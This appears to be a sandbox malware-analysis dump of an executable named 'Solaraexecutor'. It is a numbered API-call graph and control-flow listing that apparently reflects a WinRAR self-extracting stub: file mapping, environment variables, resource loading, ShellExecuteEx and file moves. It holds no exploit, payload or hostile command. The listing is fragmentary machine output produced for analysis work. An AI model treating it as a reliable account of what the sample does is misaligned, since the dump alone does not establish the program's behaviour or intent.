24981 d475fb 42 API calls __vsnwprintf_l 24879->24981 24882 d308a1 24880->24882 24883 d308b9 GetProcAddress 24880->24883 24892 d30c32 24881->24892 24882->24883 24885 d308cb 24883->24885 24885->24879 24886 d30b54 24886->24881 24887 d30b5f GetModuleFileNameW CreateFileW 24886->24887 24888 d30c08 CloseHandle 24887->24888 24889 d30b8f SetFilePointer 24887->24889 24888->24881 24889->24888 24890 d30b9d ReadFile 24889->24890 24890->24888 24894 d30bbb 24890->24894 24895 d30c94 GetFileAttributesW 24892->24895 24897 d30c5d CompareStringW 24892->24897 24898 d30cac 24892->24898 24972 d2b146 24892->24972 24975 d3081b 24892->24975 24894->24888 24896 d3081b 2 API calls 24894->24896 24895->24892 24895->24898 24896->24894 24897->24892 24899 d30cb7 24898->24899 24902 d30cec 24898->24902 24901 d30cd0 GetFileAttributesW 24899->24901 24903 d30ce8 24899->24903 24900 d30dfb 24924 d3a64d GetCurrentDirectoryW 24900->24924 24901->24899 24901->24903 24902->24900 24904 d2b146 GetVersionExW 24902->24904 24903->24902 24905 d30d06 24904->24905 24906 d30d73 24905->24906 24907 d30d0d 24905->24907 24909 d24092 _swprintf 51 API calls 24906->24909 24908 d3081b 2 API calls 24907->24908 24910 d30d17 24908->24910 24911 d30d9b AllocConsole 24909->24911 24914 d3081b 2 API calls 24910->24914 24912 d30df3 ExitProcess 24911->24912 24913 d30da8 GetCurrentProcessId AttachConsole 24911->24913 24982 d43e13 24913->24982 24916 d30d21 24914->24916 24918 d2e617 53 API calls 24916->24918 24919 d30d3c 24918->24919 24920 d24092 _swprintf 51 API calls 24919->24920 24921 d30d4f 24920->24921 24922 d2e617 53 API calls 24921->24922 24923 d30d5e 24922->24923 24923->24912 24924->24766 24926 d3081b 2 API calls 24925->24926 24927 d3ac2a OleInitialize 24926->24927 24928 d3ac4d GdiplusStartup SHGetMalloc 24927->24928 24928->24768 24930 d3c5ce 24929->24930 24931 d3c6e4 24930->24931 24932 d31fac CharUpperW 24930->24932 24984 d2f3fa 82 API calls 2 library calls 24930->24984 24931->24777 24931->24778 24932->24930 24935 d3ec50 24934->24935 24936 d3dbeb SetEnvironmentVariableW 24935->24936 24938 d3dc0e 24936->24938 24937 d3dc36 24937->24770 24938->24937 24939 d3dc2a SetEnvironmentVariableW 24938->24939 24939->24937 24941 d3b70b GetObjectW 24940->24941 24942 d3b6fe 24940->24942 24946 d3b71a 24941->24946 24985 d3a6c2 FindResourceW 24942->24985 24945 d3a5c6 4 API calls 24947 d3b72d 24945->24947 24946->24945 24948 d3b770 24947->24948 24949 d3b74c 24947->24949 24951 d3a6c2 13 API calls 24947->24951 24959 d2da42 24948->24959 25001 d3a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24949->25001 24953 d3b73d 24951->24953 24952 d3b754 25002 d3a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24952->25002 24953->24949 24954 d3b743 DeleteObject 24953->24954 24954->24949 24956 d3b75d 25003 d3a80c 8 API calls 24956->25003 24958 d3b764 DeleteObject 24958->24948 25012 d2da67 24959->25012 24964 d390b7 24965 d3eb38 8 API calls 24964->24965 24966 d390d6 24965->24966 24966->24790 24968 d3acab GdiplusShutdown CoUninitialize 24967->24968 24968->24806 24970->24798 24971->24805 24973 d2b196 24972->24973 24974 d2b15a GetVersionExW 24972->24974 24973->24892 24974->24973 24976 d3ec50 24975->24976 24977 d30828 GetSystemDirectoryW 24976->24977 24978 d30840 24977->24978 24979 d3085e 24977->24979 24980 d30851 LoadLibraryW 24978->24980 24979->24892 24980->24979 24981->24886 24983 d30dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24982->24983 24983->24912 24984->24930 24986 d3a6e5 SizeofResource 24985->24986 24987 d3a7d3 24985->24987 24986->24987 24988 d3a6fc LoadResource 24986->24988 24987->24941 24987->24946 24988->24987 24989 d3a711 LockResource 24988->24989 24989->24987 24990 d3a722 GlobalAlloc 24989->24990 24990->24987 24991 d3a73d GlobalLock 24990->24991 24992 d3a7cc GlobalFree 24991->24992 24993 d3a74c __InternalCxxFrameHandler 24991->24993 24992->24987 24994 d3a754 CreateStreamOnHGlobal 24993->24994 24995 d3a7c5 GlobalUnlock 24994->24995 24996 d3a76c 24994->24996 24995->24992 25004 d3a626 GdipAlloc 24996->25004 24999 d3a7b0 24999->24995 25000 d3a79a GdipCreateHBITMAPFromBitmap 25000->24999 25001->24952 25002->24956 25003->24958 25005 d3a645 25004->25005 25006 d3a638 25004->25006 25005->24995 25005->24999 25005->25000 25008 d3a3b9 25006->25008 25009 d3a3e1 GdipCreateBitmapFromStream 25008->25009 25010 d3a3da GdipCreateBitmapFromStreamICM 25008->25010 25011 d3a3e6 25009->25011 25010->25011 25011->25005 25013 d2da75 __EH_prolog 25012->25013 25014 d2daa4 GetModuleFileNameW 25013->25014 25015 d2dad5 25013->25015 25016 d2dabe 25014->25016 25058 d298e0 25015->25058 25016->25015 25018 d2db31 25069 d46310 25018->25069 25019 d2959a 80 API calls 25022 d2da4e 25019->25022 25021 d2e261 78 API calls 25024 d2db05 25021->25024 25056 d2e29e GetModuleHandleW FindResourceW 25022->25056 25023 d2db44 25025 d46310 26 API calls 25023->25025 25024->25018 25024->25021 25036 d2dd4a 25024->25036 25033 d2db56 ___vcrt_InitializeCriticalSectionEx 25025->25033 25026 d2dc85 25026->25036 25089 d29d70 81 API calls 25026->25089 25028 d29e80 79 API calls 25028->25033 25030 d2dc9f ___std_exception_copy 25031 d29bd0 82 API calls 25030->25031 25030->25036 25034 d2dcc8 ___std_exception_copy 25031->25034 25033->25026 25033->25028 25033->25036 25083 d29bd0 25033->25083 25088 d29d70 81 API calls 25033->25088 25034->25036 25053 d2dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25034->25053 25090 d31b84 MultiByteToWideChar 25034->25090 25036->25019 25037 d2e159 25042 d2e1de 25037->25042 25096 d48cce 26 API calls 2 library calls 25037->25096 25040 d2e16e 25097 d47625 26 API calls 2 library calls 25040->25097 25041 d2e214 25047 d46310 26 API calls 25041->25047 25042->25041 25046 d2e261 78 API calls 25042->25046 25044 d2e1c6 25098 d2e27c 78 API calls 25044->25098 25046->25042 25048 d2e22d 25047->25048 25049 d46310 26 API calls 25048->25049 25049->25036 25052 d31da7 WideCharToMultiByte 25052->25053 25053->25036 25053->25037 25053->25052 25091 d2e5b1 50 API calls __vsnprintf 25053->25091 25092 d46159 26 API calls 3 library calls 25053->25092 25093 d48cce 26 API calls 2 library calls 25053->25093 25094 d47625 26 API calls 2 library calls 25053->25094 25095 d2e27c 78 API calls 25053->25095 25057 d2da55 25056->25057 25057->24964 25059 d298ea 25058->25059 25060 d2994b CreateFileW 25059->25060 25061 d2996c GetLastError 25060->25061 25065 d299bb 25060->25065 25062 d2bb03 GetCurrentDirectoryW 25061->25062 25063 d2998c 25062->25063 25064 d29990 CreateFileW GetLastError 25063->25064 25063->25065 25064->25065 25066 d299b5 25064->25066 25067 d299e5 SetFileTime 25065->25067 25068 d299ff 25065->25068 25066->25065 25067->25068 25068->25024 25070 d46349 25069->25070 25071 d4634d 25070->25071 25082 d46375 25070->25082 25099 d491a8 20 API calls _abort 25071->25099 25073 d46699 25075 d3fbbc CatchGuardHandler 5 API calls 25073->25075 25074 d46352 25100 d49087 26 API calls _abort 25074->25100 25077 d466a6 25075->25077 25077->25023 25078 d4635d 25079 d3fbbc CatchGuardHandler 5 API calls 25078->25079 25081 d46369 25079->25081 25081->25023 25082->25073 25101 d46230 5 API calls CatchGuardHandler 25082->25101 25084 d29bdc 25083->25084 25086 d29be3 25083->25086 25084->25033 25086->25084 25087 d29785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25086->25087 25102 d26d1a 77 API calls 25086->25102 25087->25086 25088->25033 25089->25030 25090->25053 25091->25053 25092->25053 25093->25053 25094->25053 25095->25053 25096->25040 25097->25044 25098->25042 25099->25074 25100->25078 25101->25082 25102->25086 25104 d47ce1 _unexpected 25103->25104 25105 d47ce8 25104->25105 25106 d47cfa 25104->25106 25139 d47e2f GetModuleHandleW 25105->25139 25127 d4ac31 EnterCriticalSection 25106->25127 25109 d47ced 25109->25106 25140 d47e73 GetModuleHandleExW 25109->25140 25114 d47d01 25124 d47d9f 25114->25124 25126 d47d76 25114->25126 25148 d487e0 20 API calls _abort 25114->25148 25115 d47dbc 25131 d47dee 25115->25131 25116 d47de8 25149 d52390 5 API calls CatchGuardHandler 25116->25149 25118 d48a91 _abort 5 API calls 25123 d47d8e 25118->25123 25119 d48a91 _abort 5 API calls 25119->25124 25123->25119 25128 d47ddf 25124->25128 25126->25118 25126->25123 25127->25114 25150 d4ac81 LeaveCriticalSection 25128->25150 25130 d47db8 25130->25115 25130->25116 25151 d4b076 25131->25151 25134 d47e1c 25137 d47e73 _abort 8 API calls 25134->25137 25135 d47dfc GetPEB 25135->25134 25136 d47e0c GetCurrentProcess TerminateProcess 25135->25136 25136->25134 25138 d47e24 ExitProcess 25137->25138 25139->25109 25141 d47ec0 25140->25141 25142 d47e9d GetProcAddress 25140->25142 25144 d47ec6 FreeLibrary 25141->25144 25145 d47ecf 25141->25145 25143 d47eb2 25142->25143 25143->25141 25144->25145 25146 d3fbbc CatchGuardHandler 5 API calls 25145->25146 25147 d47cf9 25146->25147 25147->25106 25148->25126 25150->25130 25152 d4b091 25151->25152 25153 d4b09b 25151->25153 25155 d3fbbc CatchGuardHandler 5 API calls 25152->25155 25154 d4ac98 _abort 5 API calls 25153->25154 25154->25152 25156 d47df8 25155->25156 25156->25134 25156->25135 25341 d3b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25382 d31bbd GetCPInfo IsDBCSLeadByte 25306 d3dca1 DialogBoxParamW 25383 d3f3a0 27 API calls 25309 d4a4a0 71 API calls _free 25343 d3eda7 48 API calls _unexpected 25365 d4a6a0 31 API calls 2 library calls 25310 d508a0 IsProcessorFeaturePresent 25384 d26faa 111 API calls 3 library calls 25312 d3e455 14 API calls ___delayLoadHelper2@8 23489 d3cd58 23490 d3ce22 23489->23490 23496 d3cd7b 23489->23496 23502 d3c793 _wcslen _wcsrchr 23490->23502 23517 d3d78f 23490->23517 23493 d3d40a 23495 d31fbb CompareStringW 23495->23496 23496->23490 23496->23495 23497 d3ca67 SetWindowTextW 23497->23502 23502->23493 23502->23497 23503 d3c855 SetFileAttributesW 23502->23503 23508 d3cc31 GetDlgItem SetWindowTextW SendMessageW 23502->23508 23512 d3cc71 SendMessageW 23502->23512 23516 d31fbb CompareStringW 23502->23516 23541 d3b314 23502->23541 23545 d3a64d GetCurrentDirectoryW 23502->23545 23550 d2a5d1 6 API calls 23502->23550 23551 d2a55a FindClose 23502->23551 23552 d3b48e 76 API calls 2 library calls 23502->23552 23553 d43e3e 23502->23553 23504 d3c90f GetFileAttributesW 23503->23504 23510 d3c86f __cftof _wcslen 23503->23510 23504->23502 23507 d3c921 DeleteFileW 23504->23507 23507->23502 23509 d3c932 23507->23509 23508->23502 23547 d24092 23509->23547 23510->23502 23510->23504 23546 d2b991 51 API calls 2 library calls 23510->23546 23512->23502 23514 d3c967 MoveFileW 23514->23502 23515 d3c97f MoveFileExW 23514->23515 23515->23502 23516->23502 23521 d3d799 __cftof _wcslen 23517->23521 23518 d3d9e7 23518->23502 23519 d3d9c0 23519->23518 23525 d3d9de ShowWindow 23519->23525 23520 d3d8a5 23566 d2a231 23520->23566 23521->23518 23521->23519 23521->23520 23569 d31fbb CompareStringW 23521->23569 23525->23518 23526 d3d8d9 ShellExecuteExW 23526->23518 23531 d3d8ec 23526->23531 23528 d3d8d1 23528->23526 23529 d3d925 23571 d3dc3b 6 API calls 23529->23571 23530 d3d97b CloseHandle 23532 d3d989 23530->23532 23533 d3d994 23530->23533 23531->23529 23531->23530 23534 d3d91b ShowWindow 23531->23534 23572 d31fbb CompareStringW 23532->23572 23533->23519 23534->23529 23537 d3d93d 23537->23530 23538 d3d950 GetExitCodeProcess 23537->23538 23538->23530 23539 d3d963 23538->23539 23539->23530 23542 d3b31e 23541->23542 23543 d3b40d 23542->23543 23544 d3b3f0 ExpandEnvironmentStringsW 23542->23544 23543->23502 23544->23543 23545->23502 23546->23510 23587 d24065 23547->23587 23550->23502 23551->23502 23552->23502 23554 d48e54 23553->23554 23555 d48e61 23554->23555 23556 d48e6c 23554->23556 23667 d48e06 23555->23667 23558 d48e74 23556->23558 23564 d48e7d _abort 23556->23564 23559 d48dcc _free 20 API calls 23558->23559 23562 d48e69 23559->23562 23560 d48ea7 HeapReAlloc 23560->23562 23560->23564 23561 d48e82 23674 d491a8 20 API calls _abort 23561->23674 23562->23502 23564->23560 23564->23561 23675 d47a5e 7 API calls 2 library calls 23564->23675 23573 d2a243 23566->23573 23569->23520 23570 d2b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23570->23528 23571->23537 23572->23533 23581 d3ec50 23573->23581 23576 d2a261 23583 d2bb03 23576->23583 23577 d2a23a 23577->23526 23577->23570 23579 d2a275 23579->23577 23580 d2a279 GetFileAttributesW 23579->23580 23580->23577 23582 d2a250 GetFileAttributesW 23581->23582 23582->23576 23582->23577 23584 d2bb10 _wcslen 23583->23584 23585 d2bbb8 GetCurrentDirectoryW 23584->23585 23586 d2bb39 _wcslen 23584->23586 23585->23586 23586->23579 23588 d2407c __vswprintf_c_l 23587->23588 23591 d45fd4 23588->23591 23594 d44097 23591->23594 23595 d440d7 23594->23595 23596 d440bf 23594->23596 23595->23596 23598 d440df 23595->23598 23611 d491a8 20 API calls _abort 23596->23611 23613 d44636 23598->23613 23599 d440c4 23612 d49087 26 API calls _abort 23599->23612 23603 d440cf 23624 d3fbbc 23603->23624 23606 d44167 23622 d449e6 51 API calls 3 library calls 23606->23622 23607 d24086 GetFileAttributesW 23607->23509 23607->23514 23610 d44172 23623 d446b9 20 API calls _free 23610->23623 23611->23599 23612->23603 23614 d44653 23613->23614 23620 d440ef 23613->23620 23614->23620 23631 d497e5 GetLastError 23614->23631 23616 d44674 23652 d4993a 38 API calls __cftof 23616->23652 23618 d4468d 23653 d49967 38 API calls __cftof 23618->23653 23621 d44601 20 API calls 2 library calls 23620->23621 23621->23606 23622->23610 23623->23603 23625 d3fbc5 IsProcessorFeaturePresent 23624->23625 23626 d3fbc4 23624->23626 23628 d3fc07 23625->23628 23626->23607 23666 d3fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23628->23666 23630 d3fcea 23630->23607 23632 d49807 23631->23632 23633 d497fb 23631->23633 23655 d4b136 20 API calls 2 library calls 23632->23655 23654 d4ae5b 11 API calls 2 library calls 23633->23654 23636 d49801 23636->23632 23638 d49850 SetLastError 23636->23638 23637 d49813 23639 d4981b 23637->23639 23662 d4aeb1 11 API calls 2 library calls 23637->23662 23638->23616 23656 d48dcc 23639->23656 23641 d49830 23641->23639 23644 d49837 23641->23644 23643 d49821 23645 d4985c SetLastError 23643->23645 23663 d49649 20 API calls _abort 23644->23663 23664 d48d24 38 API calls _abort 23645->23664 23647 d49842 23649 d48dcc _free 20 API calls 23647->23649 23651 d49849 23649->23651 23651->23638 23651->23645 23652->23618 23653->23620 23654->23636 23655->23637 23657 d48e00 __dosmaperr 23656->23657 23658 d48dd7 RtlFreeHeap 23656->23658 23657->23643 23658->23657 23659 d48dec 23658->23659 23665 d491a8 20 API calls _abort 23659->23665 23661 d48df2 GetLastError 23661->23657 23662->23641 23663->23647 23665->23661 23666->23630 23668 d48e44 23667->23668 23672 d48e14 _abort 23667->23672 23677 d491a8 20 API calls _abort 23668->23677 23670 d48e2f RtlAllocateHeap 23671 d48e42 23670->23671 23670->23672 23671->23562 23672->23668 23672->23670 23676 d47a5e 7 API calls 2 library calls 23672->23676 23674->23562 23675->23564 23676->23672 23677->23671 25313 d3a440 GdipCloneImage GdipAlloc 25367 d43a40 5 API calls CatchGuardHandler 25385 d51f40 CloseHandle 23725 d3e44b 23726 d3e3f4 23725->23726 23726->23725 23727 d3e85d ___delayLoadHelper2@8 14 API calls 23726->23727 23727->23726 25387 d21f72 128 API calls __EH_prolog 25315 d3a070 10 API calls 25368 d3b270 99 API calls 23776 d29a74 23780 d29a7e 23776->23780 23777 d29ab1 23778 d29b9d SetFilePointer 23778->23777 23779 d29bb6 GetLastError 23778->23779 23779->23777 23780->23777 23780->23778 23782 d29b79 23780->23782 23783 d2981a 23780->23783 23782->23778 23784 d29833 23783->23784 23787 d29e80 23784->23787 23788 d29e92 23787->23788 23789 d29ea5 23787->23789 23790 d29865 23788->23790 23796 d26d5b 77 API calls 23788->23796 23789->23790 23791 d29eb8 SetFilePointer 23789->23791 23790->23782 23791->23790 23793 d29ed4 GetLastError 23791->23793 23793->23790 23794 d29ede 23793->23794 23794->23790 23797 d26d5b 77 API calls 23794->23797 23796->23789 23797->23790 25317 d21075 84 API calls 23798 d29f7a 23799 d29f88 23798->23799 23800 d29f8f 23798->23800 23801 d29f9c GetStdHandle 23800->23801 23808 d29fab 23800->23808 23801->23808 23802 d2a003 WriteFile 23802->23808 23803 d29fd4 WriteFile 23804 d29fcf 23803->23804 23803->23808 23804->23803 23804->23808 23806 d2a095 23810 d26e98 77 API calls 23806->23810 23808->23799 23808->23802 23808->23803 23808->23804 23808->23806 23809 d26baa 78 API calls 23808->23809 23809->23808 23810->23799 25319 d3c793 107 API calls 4 library calls 24687 d3e569 24688 d3e517 24687->24688 24689 d3e85d ___delayLoadHelper2@8 14 API calls 24688->24689 24689->24688 25389 d47f6e 52 API calls 3 library calls 25369 d48268 55 API calls _free 25390 d21710 86 API calls 25349 d3ad10 73 API calls 25322 d3a400 GdipDisposeImage GdipFree 25370 d3d600 70 API calls 25323 d46000 QueryPerformanceFrequency QueryPerformanceCounter 25352 d42900 6 API calls 4 library calls 25371 d4f200 51 API calls 25392 d4a700 21 API calls 25355 d3f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25393 d3ff30 LocalFree 25160 d4bb30 25161 d4bb39 25160->25161 25163 d4bb42 25160->25163 25164 d4ba27 25161->25164 25165 d497e5 _unexpected 38 API calls 25164->25165 25166 d4ba34 25165->25166 25184 d4bb4e 25166->25184 25168 d4ba3c 25193 d4b7bb 25168->25193 25171 d4ba53 25171->25163 25172 d48e06 __vswprintf_c_l 21 API calls 25173 d4ba64 25172->25173 25174 d4ba96 25173->25174 25200 d4bbf0 25173->25200 25176 d48dcc _free 20 API calls 25174->25176 25176->25171 25178 d4ba91 25210 d491a8 20 API calls _abort 25178->25210 25180 d4bada 25180->25174 25211 d4b691 26 API calls 25180->25211 25181 d4baae 25181->25180 25182 d48dcc _free 20 API calls 25181->25182 25182->25180 25185 d4bb5a ___scrt_is_nonwritable_in_current_image 25184->25185 25186 d497e5 _unexpected 38 API calls 25185->25186 25188 d4bb64 25186->25188 25189 d4bbe8 _abort 25188->25189 25192 d48dcc _free 20 API calls 25188->25192 25212 d48d24 38 API calls _abort 25188->25212 25213 d4ac31 EnterCriticalSection 25188->25213 25214 d4bbdf LeaveCriticalSection _abort 25188->25214 25189->25168 25192->25188 25194 d44636 __cftof 38 API calls 25193->25194 25195 d4b7cd 25194->25195 25196 d4b7dc GetOEMCP 25195->25196 25197 d4b7ee 25195->25197 25199 d4b805 25196->25199 25198 d4b7f3 GetACP 25197->25198 25197->25199 25198->25199 25199->25171 25199->25172 25201 d4b7bb 40 API calls 25200->25201 25202 d4bc0f 25201->25202 25205 d4bc60 IsValidCodePage 25202->25205 25207 d4bc16 25202->25207 25209 d4bc85 __cftof 25202->25209 25203 d3fbbc CatchGuardHandler 5 API calls 25204 d4ba89 25203->25204 25204->25178 25204->25181 25206 d4bc72 GetCPInfo 25205->25206 25205->25207 25206->25207 25206->25209 25207->25203 25215 d4b893 GetCPInfo 25209->25215 25210->25174 25211->25174 25213->25188 25214->25188 25216 d4b977 25215->25216 25217 d4b8cd 25215->25217 25220 d3fbbc CatchGuardHandler 5 API calls 25216->25220 25225 d4c988 25217->25225 25222 d4ba23 25220->25222 25222->25207 25224 d4ab78 __vswprintf_c_l 43 API calls 25224->25216 25226 d44636 __cftof 38 API calls 25225->25226 25227 d4c9a8 MultiByteToWideChar 25226->25227 25229 d4c9e6 25227->25229 25230 d4ca7e 25227->25230 25232 d48e06 __vswprintf_c_l 21 API calls 25229->25232 25235 d4ca07 __cftof __vsnwprintf_l 25229->25235 25231 d3fbbc CatchGuardHandler 5 API calls 25230->25231 25233 d4b92e 25231->25233 25232->25235 25239 d4ab78 25233->25239 25234 d4ca78 25244 d4abc3 20 API calls _free 25234->25244 25235->25234 25237 d4ca4c MultiByteToWideChar 25235->25237 25237->25234 25238 d4ca68 GetStringTypeW 25237->25238 25238->25234 25240 d44636 __cftof 38 API calls 25239->25240 25241 d4ab8b 25240->25241 25245 d4a95b 25241->25245 25244->25230 25246 d4a976 __vswprintf_c_l 25245->25246 25247 d4a99c MultiByteToWideChar 25246->25247 25248 d4a9c6 25247->25248 25249 d4ab50 25247->25249 25253 d48e06 __vswprintf_c_l 21 API calls 25248->25253 25255 d4a9e7 __vsnwprintf_l 25248->25255 25250 d3fbbc CatchGuardHandler 5 API calls 25249->25250 25251 d4ab63 25250->25251 25251->25224 25252 d4aa30 MultiByteToWideChar 25254 d4aa49 25252->25254 25267 d4aa9c 25252->25267 25253->25255 25272 d4af6c 25254->25272 25255->25252 25255->25267 25259 d4aa73 25262 d4af6c __vswprintf_c_l 11 API calls 25259->25262 25259->25267 25260 d4aaab 25261 d48e06 __vswprintf_c_l 21 API calls 25260->25261 25265 d4aacc __vsnwprintf_l 25260->25265 25261->25265 25262->25267 25263 d4ab41 25280 d4abc3 20 API calls _free 25263->25280 25265->25263 25266 d4af6c __vswprintf_c_l 11 API calls 25265->25266 25268 d4ab20 25266->25268 25281 d4abc3 20 API calls _free 25267->25281 25268->25263 25269 d4ab2f WideCharToMultiByte 25268->25269 25269->25263 25270 d4ab6f 25269->25270 25282 d4abc3 20 API calls _free 25270->25282 25273 d4ac98 _abort 5 API calls 25272->25273 25274 d4af93 25273->25274 25278 d4af9c 25274->25278 25283 d4aff4 10 API calls 3 library calls 25274->25283 25276 d4afdc LCMapStringW 25276->25278 25277 d3fbbc CatchGuardHandler 5 API calls 25279 d4aa60 25277->25279 25278->25277 25279->25259 25279->25260 25279->25267 25280->25267 25281->25249 25282->25267 25283->25276 25326 d4c030 GetProcessHeap 25372 d3c220 93 API calls _swprintf 25328 d4f421 21 API calls __vswprintf_c_l 25329 d21025 29 API calls 25356 d4b4ae 27 API calls CatchGuardHandler

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00D30863: GetModuleHandleW.KERNEL32(kernel32), ref: 00D3087C
                                                        • Part of subcall function 00D30863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D3088E
                                                        • Part of subcall function 00D30863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D308BF
                                                        • Part of subcall function 00D3A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D3A655
                                                        • Part of subcall function 00D3AC16: OleInitialize.OLE32(00000000), ref: 00D3AC2F
                                                        • Part of subcall function 00D3AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D3AC66
                                                        • Part of subcall function 00D3AC16: SHGetMalloc.SHELL32(00D68438), ref: 00D3AC70
                                                      • GetCommandLineW.KERNEL32 ref: 00D3DF5C
                                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D3DF83
                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D3DF94
                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00D3DFCE
                                                        • Part of subcall function 00D3DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D3DBF4
                                                        • Part of subcall function 00D3DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D3DC30
                                                      • CloseHandle.KERNEL32(00000000), ref: 00D3DFD7
                                                      • GetModuleFileNameW.KERNEL32(00000000,00D7EC90,00000800), ref: 00D3DFF2
                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00D7EC90), ref: 00D3DFFE
                                                      • GetLocalTime.KERNEL32(?), ref: 00D3E009
                                                      • _swprintf.LIBCMT ref: 00D3E048
                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D3E05A
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00D3E061
                                                      • LoadIconW.USER32(00000000,00000064), ref: 00D3E078
                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00D3E0C9
                                                      • Sleep.KERNEL32(?), ref: 00D3E0F7
                                                      • DeleteObject.GDI32 ref: 00D3E130
                                                      • DeleteObject.GDI32(?), ref: 00D3E140
                                                      • CloseHandle.KERNEL32 ref: 00D3E183
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                      • API String ID: 3049964643-3743209390
                                                      • Opcode ID: 18b7fb7fb835cc0db4c282a6b2b735d68a28cd2db81c97b7c3d7da2c6be75e61
                                                      • Instruction ID: 7f1750e5ad331f0bca3ebf6e578ee08fa72e9cd201941b99d24afdf3ebc1ed11
                                                      • Opcode Fuzzy Hash: 18b7fb7fb835cc0db4c282a6b2b735d68a28cd2db81c97b7c3d7da2c6be75e61
                                                      • Instruction Fuzzy Hash: F261E271904345AFD321AF74AC49F2B7BADEB08741F040429F949D23D1EBB49948CBB2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 812 d3a6c2-d3a6df FindResourceW 813 d3a6e5-d3a6f6 SizeofResource 812->813 814 d3a7db 812->814 813->814 816 d3a6fc-d3a70b LoadResource 813->816 815 d3a7dd-d3a7e1 814->815 816->814 817 d3a711-d3a71c LockResource 816->817 817->814 818 d3a722-d3a737 GlobalAlloc 817->818 819 d3a7d3-d3a7d9 818->819 820 d3a73d-d3a746 GlobalLock 818->820 819->815 821 d3a7cc-d3a7cd GlobalFree 820->821 822 d3a74c-d3a76a call d40320 CreateStreamOnHGlobal 820->822 821->819 825 d3a7c5-d3a7c6 GlobalUnlock 822->825 826 d3a76c-d3a78e call d3a626 822->826 825->821 826->825 831 d3a790-d3a798 826->831 832 d3a7b3-d3a7c1 831->832 833 d3a79a-d3a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 d3a7b0 833->834 834->832
                                                      APIs
                                                      • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D3B73D,00000066), ref: 00D3A6D5
                                                      • SizeofResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A6EC
                                                      • LoadResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A703
                                                      • LockResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A712
                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D3B73D,00000066), ref: 00D3A72D
                                                      • GlobalLock.KERNEL32(00000000), ref: 00D3A73E
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D3A762
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00D3A7C6
                                                        • Part of subcall function 00D3A626: GdipAlloc.GDIPLUS(00000010), ref: 00D3A62C
                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D3A7A7
                                                      • GlobalFree.KERNEL32(00000000), ref: 00D3A7CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
